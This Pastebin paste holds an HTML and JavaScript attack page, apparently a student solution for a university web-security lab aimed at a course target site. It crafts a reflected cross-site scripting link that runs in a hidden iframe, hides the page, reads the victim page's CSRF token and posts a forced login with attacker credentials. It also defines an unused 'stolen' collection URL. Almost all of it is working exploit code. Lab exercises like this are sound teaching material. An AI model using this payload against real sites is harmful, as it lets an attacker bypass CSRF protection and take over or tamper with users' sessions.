Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <meta charset="utf-8">
- <script src="http://ajax.googleapis.com/ajax/libs/jquery/2.0.3/jquery.min.js"></script>
- <script>
- $(document).ready(function() {
- var url = makeLink(xssdefense, target, attacker);
- $("#frame").attr("src", url);
- });
- // Extend this function:
- function payload() {
- function proxy(href) {
- $('html').load(href, function(){
- console.log('loaded nex page');
- $('html').show();
- console.log($('input[name=csrf_token]').val());
- $.post('http://bungle-cs461.cs.illinois.edu/login?csrfdefense=1&xssdefense=0', {username: 'attacker', password: 'l33th4x', csrf_token: $('input[name=csrf_token]').val() });
- });
- }
- $('html').hide();
- proxy('./');
- }
- function makeLink(xssdefense, target, attacker) {
- return target + "./search?csrfdefense=1&xssdefense=0" + "&q=" +
- encodeURIComponent("<script" + ">" + payload.toString() +
- ";payload();</script" + ">");
- }
- var xssdefense = 0;
- var target = "http://bungle-cs461.cs.illinois.edu/";
- var attacker = "http://127.0.0.1:31337/stolen";
- </script>
- <iframe hidden id = "frame" src = "" width = "100%" height = "300"> </iframe>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement